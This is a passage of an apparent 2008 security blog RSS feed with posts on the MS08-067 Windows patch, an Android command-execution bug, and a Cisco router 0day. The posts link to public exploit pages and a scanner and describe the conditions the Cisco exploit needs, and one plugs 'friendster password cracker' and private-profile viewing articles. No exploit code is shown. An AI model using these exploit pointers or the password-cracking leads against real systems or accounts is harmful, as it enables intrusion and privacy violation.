		<category><![CDATA[descargar ms08-67]]></category>
		<category><![CDATA[download microsoft ms08-067]]></category>
		<category><![CDATA[download microsoft ms08-67]]></category>
		<category><![CDATA[download ms08-067]]></category>
		<category><![CDATA[download ms08-067 torrent]]></category>
		<category><![CDATA[download ms08-67]]></category>
		<category><![CDATA[download ms08-67 patch]]></category>
		<category><![CDATA[download ms08-67 vulnerability patch]]></category>
		<category><![CDATA[download patch for ms08-067 vulnerability]]></category>
		<category><![CDATA[download patch ms08-067]]></category>
		<category><![CDATA[download patch ms08-067 vulnerability]]></category>
		<category><![CDATA[download symantec patch ms08-067]]></category>
		<category><![CDATA[download vulnerability update 08 67]]></category>
		<category><![CDATA[free download for ms08-067 vulnerability patch]]></category>
		<category><![CDATA[http://www.microsoft.com/downloads/results. aspx? pocid=&freetext=kb886716&displaylang=en]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[microsoft 508-067]]></category>
		<category><![CDATA[microsoft download ms08-067]]></category>
		<category><![CDATA[microsoft patch ms08-067 download]]></category>
		<category><![CDATA[microsoft patch ms08-067,download]]></category>
		<category><![CDATA[microsoft patch ms08-67]]></category>
		<category><![CDATA[microsoft security patch ms08 067 download]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[microsoft's ms08 067 patch download]]></category>
		<category><![CDATA[ms 08 067 download]]></category>
		<category><![CDATA[ms08 067 vista]]></category>
		<category><![CDATA[ms08 67]]></category>
		<category><![CDATA[ms08-067 demo-exploit]]></category>
		<category><![CDATA[ms08-067 download]]></category>
		<category><![CDATA[ms08-067 exploit download]]></category>
		<category><![CDATA[ms08-067 güncellemesi indir]]></category>
		<category><![CDATA[ms08-067 patch]]></category>
		<category><![CDATA[ms08-067 patch download]]></category>
		<category><![CDATA[ms08-067 security patch download]]></category>
		<category><![CDATA[ms08-067 vulnerability patch]]></category>
		<category><![CDATA[ms08-67 download]]></category>
		<category><![CDATA[ms08-67 patch]]></category>
		<category><![CDATA[MS08-67 patch Download]]></category>
		<category><![CDATA[ms08-67 patch download 958644]]></category>
		<category><![CDATA[ms08-67 vulnerability download]]></category>
		<category><![CDATA[ms08067 download]]></category>
		<category><![CDATA[Operating System]]></category>
		<category><![CDATA[parche ms508-067]]></category>
		<category><![CDATA[patch for ms08-067 vulnerability]]></category>
		<category><![CDATA[patch for the ms08-67 vulnerability]]></category>
		<category><![CDATA[patch ms 508-067]]></category>
		<category><![CDATA[patch ms08-067]]></category>
		<category><![CDATA[patch ms08-067 download]]></category>
		<category><![CDATA[patch MS08-67]]></category>
		<category><![CDATA[patch vulnerability ms08-067]]></category>
		<category><![CDATA[path ms508-067]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows 2000]]></category>
		<category><![CDATA[windows 2000 ms08-67 patch]]></category>
		<category><![CDATA[Windows Server 2003]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=444</guid>
		<description><![CDATA[

Since MS08-067 exploit &#8217;s published , there are a lot of mass exploitation to my friend&#8217;s workstations which mostly run Windows server 2003 and Windows xp sp2. I think it&#8217;s important to patch the vulnerability as soon as possible , just don&#8217;t let your workstations get hacked just because of this MS08-67 exploit. You can [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img zemanta-action-click">
<div class="wp-caption alignright" style="width: 114px"><a href="http://www.daylife.com/image/05vWejC0fk4b0?utm_source=zemanta&amp;utm_medium=p&amp;utm_content=05vWejC0fk4b0&amp;utm_campaign=z1"><img title="SAN FRANCISCO - MARCH 22:  (FILE PHOTO) A lapt..." src="http://cache.daylife.com/imageserve/05vWejC0fk4b0/104x150.jpg" alt="SAN FRANCISCO - MARCH 22:  (FILE PHOTO) A lapt..." width="104" height="150" /></a><p class="wp-caption-text">Image by Getty Images via Daylife</p></div>
</div>
<p>Since <strong>MS08-067 exploit</strong> &#8217;s published , there are a lot of mass exploitation to my friend&#8217;s workstations which mostly run Windows server 2003 and Windows xp sp2. I think it&#8217;s important to patch the vulnerability as soon as possible , just don&#8217;t let your workstations get hacked just because of this MS08-67 exploit. You can <strong>download ms08-067 exploit patch</strong> from Microsoft download center. By downloading and installing the <strong>ms06-067 patch</strong> , hopefully your workstations won&#8217;t be easily get compromised anymore.</p>
<p>Click <a href="http://www.lifedork.com/ms08-067-remote-stack-overflow-vulnerability-exploit.html" target="_blank"><strong>here</strong></a> to read my previous post about <strong>ms08-067 exploit code</strong>. And please follow this following link to begin downloading your patch based on your operating system (windows xp/2003/vista/etc) :</p>
<p><code><strong>http://www.microsoft.com/downloads/results.aspx?pocId=&amp;freetext=ms08-067&amp;DisplayLang=en</strong></code></p>
<h6 class="zemanta-related-title" style="font-size: 1em;">Related articles :</h6>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.vnunet.com/vnunet/news/2230105/microsoft-deliver-pair-november">Microsoft to deliver a pair of November fixes</a></li>
<li class="zemanta-article-ul-li"><a href="http://www.infoworld.com/article/08/10/23/Microsoft_to_rush_out_emergency_Windows_patch_1.html?source=rss&amp;url=http://www.infoworld.com/article/08/10/23/Microsoft_to_rush_out_emergency_Windows_patch_1.html">Microsoft to rush out emergency Windows patch</a></li>
<li class="zemanta-article-ul-li"><a href="http://news.cnet.com/8301-1009_3-10076559-83.html?part=rss&amp;subj=news">Microsoft issues security patch for unreleased software</a></li>
</ul>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Zemified by Zemanta" href="http://reblog.zemanta.com/zemified/3e4ecc92-9b73-4627-a4d1-8dc88270a182/"><img class="zemanta-pixie-img" style="border: medium none; float: right;" src="http://img.zemanta.com/reblog_e.png?x-id=3e4ecc92-9b73-4627-a4d1-8dc88270a182" alt="Reblog this post [with Zemanta]" /></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/ms08-067-exploit-patch-download.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Google Android &#8217;s Embarassing Security Hole</title>
		<link>http://www.lifedork.net/google-android-s-embarassing-security-hole.html</link>
		<comments>http://www.lifedork.net/google-android-s-embarassing-security-hole.html#comments</comments>
		<pubDate>Thu, 13 Nov 2008 14:09:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[friendster password]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Android]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Mobile phone]]></category>
		<category><![CDATA[Open source]]></category>
		<category><![CDATA[Searching]]></category>
		<category><![CDATA[T-Mobile]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=422</guid>
		<description><![CDATA[

Well this might be the most embarassing security hole that ever existed , the vulnerability comes from Google Android. There are two methods to do the jailbreak to the OS itself. Here&#8217;s the short excerpt from cgisecurity about this google android security hole :
&#8220;With the news that Google&#8217;s Android shipped with an embarrassing security hole [...]]]></description>
			<content:encoded><![CDATA[<div class="zemanta-img zemanta-action-dragged">
<div class="wp-caption alignleft" style="width: 250px"><a href="http://www.flickr.com/photos/28503657@N03/2861569979"><img title="Google Android" src="http://farm4.static.flickr.com/3165/2861569979_fa252ed7fd_m.jpg" alt="Google Android" width="240" height="160" /></a><p class="wp-caption-text">Image by pipot83 via Flickr</p></div>
</div>
<p>Well this might be the most embarassing <a class="zem_slink" title="Vulnerability (computing)" rel="wikipedia" href="http://en.wikipedia.org/wiki/Vulnerability_%28computing%29">security hole</a> that ever existed , the vulnerability comes from <a class="zem_slink" title="Google" rel="homepage" href="http://google.com">Google</a> <a class="zem_slink" title="Android" rel="homepage" href="http://www.android.com">Android</a>. There are two methods to do the jailbreak to the OS itself. Here&#8217;s the short excerpt from cgisecurity about this google android security hole :</p>
<blockquote><p>&#8220;With the news that Google&#8217;s Android shipped with an embarrassing security hole being followed by a simple two-step method to &#8216;jailbreak&#8217; the OS, you&#8217;d think that the company had ironed out most of the remaining bugs – but you&#8217;d be wrong.</p>
<p>According to ZDnet&#8217;s Ed Burnette, the <a class="zem_slink" title="Open source" rel="wikipedia" href="http://en.wikipedia.org/wiki/Open_source">open-source</a> <a class="zem_slink" title="Linux" rel="wikipedia" href="http://en.wikipedia.org/wiki/Linux">Linux</a>-based smartphone platform recently shipped in T-Mobile&#8217;s G1 handset contains a real doozy of a back door: it would appear that absolutely anything you write, at absolutely any time, will be evaluated as a system command.</p>
<p>The <a class="zem_slink" title="Software bug" rel="wikipedia" href="http://en.wikipedia.org/wiki/Software_bug">bug</a>, which affects handsets running Android 1.0 TC5-RC29 or earlier, can be demonstrated in a simple way: in any <a class="zem_slink" title="Text box" rel="wikipedia" href="http://en.wikipedia.org/wiki/Text_box">text entry box</a> – even on a webpage or in the address book – hit the &#8216;enter&#8217; key and type &#8216;reboot&#8217; followed by &#8216;enter&#8217; again. If your handset is vulnerable, you&#8217;ll see it suddenly decide to restart the OS.&#8221;</p>
<p>This has to be one of the most bizarre bugs I&#8217;ve ever heard of. I can&#8217;t imagine a legit business case for this, and I can&#8217;t imagine this being a <a class="zem_slink" title="Backdoor (computing)" rel="wikipedia" href="http://en.wikipedia.org/wiki/Backdoor_%28computing%29">backdoor</a> since most user entered data would error out. TheRegister also has a few amusing things to say.</p></blockquote>
<p><strong>Related articles :</strong></p>
<ul class="zemanta-article-ul">
<li class="zemanta-article-ul-li"><a href="http://www.theregister.co.uk/2008/08/20/googlephone_bug_hunt/">Googlephone security team seeks bug hunters</a></li>
<li class="zemanta-article-ul-li"><a href="http://www.infoworld.com/article/08/09/17/First_Google_Android_phone_to_debut_next_week_1.html?source=rss&amp;url=http://www.infoworld.com/article/08/09/17/First_Google_Android_phone_to_debut_next_week_1.html">First Google Android phone to debut next week</a></li>
<li class="zemanta-article-ul-li"><a href="http://www.infoworld.com/article/08/06/23/Should_IT_pros_be_thinking_about_Android-Network_World_1.html?source=rss&amp;url=http://www.infoworld.com/article/08/06/23/Should_IT_pros_be_thinking_about_Android-Network_World_1.html">Should IT pros be thinking about Android?</a></li>
<li class="zemanta-article-ul-li"><a href="http://googlesystem.blogspot.com/2007/11/google-launches-android-open-mobile.html">Google Launches Android, an Open Mobile Platform</a></li>
</ul>
<p>Please explore this blog to find out more articles about how to view private friendster profile , friendster password cracker , how to view friendster private photos , webgoat tutorials , and so on <img src='http://www.lifedork.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<div class="zemanta-pixie" style="margin-top: 10px; height: 15px;"><a class="zemanta-pixie-a" title="Zemified by Zemanta" href="http://reblog.zemanta.com/zemified/dab079be-6692-4561-9aca-c0f5e245a83f/"><img class="zemanta-pixie-img" style="border: medium none; float: right;" src="http://img.zemanta.com/reblog_e.png?x-id=dab079be-6692-4561-9aca-c0f5e245a83f" alt="Reblog this post [with Zemanta]" /></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/google-android-s-embarassing-security-hole.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS08-067 Remote Stack Overflow Vulnerability Exploit</title>
		<link>http://www.lifedork.net/ms08-067-remote-stack-overflow-vulnerability-exploit.html</link>
		<comments>http://www.lifedork.net/ms08-067-remote-stack-overflow-vulnerability-exploit.html#comments</comments>
		<pubDate>Sun, 09 Nov 2008 16:18:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[backtrack 4exploit use for server 2003]]></category>
		<category><![CDATA[exploit windows server 2003]]></category>
		<category><![CDATA[exploit windows xp3 with backtrack 4]]></category>
		<category><![CDATA[metaspolit windows 2003 sp2 r2 x64]]></category>
		<category><![CDATA[ms 08-067 exploit]]></category>
		<category><![CDATA[ms08-067 backtrak]]></category>
		<category><![CDATA[ms08-067 bt4 scan]]></category>
		<category><![CDATA[ms08067 scanner]]></category>
		<category><![CDATA[ms08_067 scanner]]></category>
		<category><![CDATA[remote expolit hack ms08-067]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=411</guid>
		<description><![CDATA[I&#8217;m sorry if it&#8217;s a bit late , but it&#8217;s still interesting to digg more about this new exploit. Microsoft released  this security vulnerability information on October 23,2008. The vulnerability itself might causes the attacker to launch remote code execution which could be very harmful.
The affected OS :
Microsoft Windows 2000 Service Pack 4
Windows XP Service [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_414" class="wp-caption alignnone" style="width: 310px"><img class="size-medium wp-image-414" title="microsoft" src="http://www.lifedork.com/wp-content/uploads/2008/11/microsoft-logo-300x240.jpg" alt="microsoft" width="300" height="240" /><p class="wp-caption-text">microsoft</p></div>
<p>I&#8217;m sorry if it&#8217;s a bit late , but it&#8217;s still interesting to digg more about this new exploit. Microsoft released  this security vulnerability information on October 23,2008. The vulnerability itself might causes the attacker to launch remote code execution which could be very harmful.</p>
<p>The affected OS :</p>
<p>Microsoft Windows 2000 Service Pack 4<br />
Windows XP Service Pack 2<br />
Windows XP Service Pack 3<br />
Windows XP Professional x64 Edition<br />
Windows XP Professional x64 Edition Service Pack 2<br />
Windows Server 2003 Service Pack 1<br />
Windows Server 2003 Service Pack 2<br />
Windows Server 2003 x64 Edition<br />
Windows Server 2003 x64 Edition Service Pack 2<br />
Windows Server 2003 with SP1 for Itanium-based Systems<br />
Windows Server 2003 with SP2 for Itanium-based Systems<br />
Windows Vista and Windows Vista Service Pack 1<br />
Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1<br />
Windows Server 2008 for 32-bit Systems*<br />
Windows Server 2008 for x64-based Systems*<br />
Windows Server 2008 for Itanium-based Systems</p>
<p>You can automate your target scanning by using the script developed by portcullis lab:</p>
<p>http://labs.portcullis.co.uk/application/ms08-067-check/</p>
<p>The real exploit link :</p>
<p>http://www.whitecell.org/list.php?id=61</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/ms08-067-remote-stack-overflow-vulnerability-exploit.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cisco 0day Finally Released</title>
		<link>http://www.lifedork.net/cisco-0day-finally-released.html</link>
		<comments>http://www.lifedork.net/cisco-0day-finally-released.html#comments</comments>
		<pubDate>Mon, 22 Sep 2008 20:52:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[secInfo]]></category>
		<category><![CDATA[0day exploit]]></category>
		<category><![CDATA[cisco 871 0day exploit]]></category>
		<category><![CDATA[cisco 871 exploits]]></category>
		<category><![CDATA[cisco router hacking]]></category>
		<category><![CDATA[cisco router remote exploit]]></category>
		<category><![CDATA[how to hack cisco]]></category>
		<category><![CDATA[metasploit cisco 3560g]]></category>
		<category><![CDATA[where is milw0rm.com]]></category>

		<guid isPermaLink="false">http://www.lifedork.com/?p=345</guid>
		<description><![CDATA[It didn&#8217;t take very long after Jeremy announced that he had discovered a remote exploit that works pretty much  universally on cisco routers which affects the HTTP Administration Interface , He finally released the 0day to the public , included milw0rm. The 0day itself was released on September 16th. The vulnerability itself affects Cisco [...]]]></description>
			<content:encoded><![CDATA[<p>It didn&#8217;t take very long after Jeremy announced that he had discovered a remote exploit that works pretty much  universally on cisco routers which affects the HTTP Administration Interface , He finally released the 0day to the public , included milw0rm. The 0day itself was released on September 16th. The vulnerability itself affects Cisco 871 router running IOS 12.4</p>
<p>This is the situation that allows the exploit to work :<br />
1) Tab of Router HTTP Administration Interface is open somewhere on the browser.<br />
2) The session is still active @ Router HTTP Admin Interface.<br />
3) The browser used has the credentials saved (No prompts /w Safari).<br />
4) Nearly any situation where the target visits the page (But if not 1, 2, or 3 a prompt will usually pop up asking for credentials)</p>
<p>Based on <a href="http://jbrownsec.blogspot.com/2008/09/cisco-0day-released.html" target="_blank">his official announcement</a> , there are two exploits available for the exploitation :<br />
Exploit #1 (<a href="http://milw0rm.com/exploits/6476" target="_blank">ciscOWN1.htm</a>):</p>
<p>Exec Mode Commands. Just specify the router&#8217;s address and command you want to be executed.</p>
<p>Exploit #2 (<a href="http://milw0rm.com/exploits/6477" target="_blank">ciscOWN2.htm</a>):</p>
<p>Configure Mode Commands. Just specify the router&#8217;s address and command you want to be executed.</p>
<p>Here&#8217;s the short video which describes the cisco exploitation : http://video.google.com/videoplay?docid=1038241899942867502&amp;hl=en</p>
]]></content:encoded>
			<wfw:commentRss>http://www.lifedork.net/cisco-0day-finally-released.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
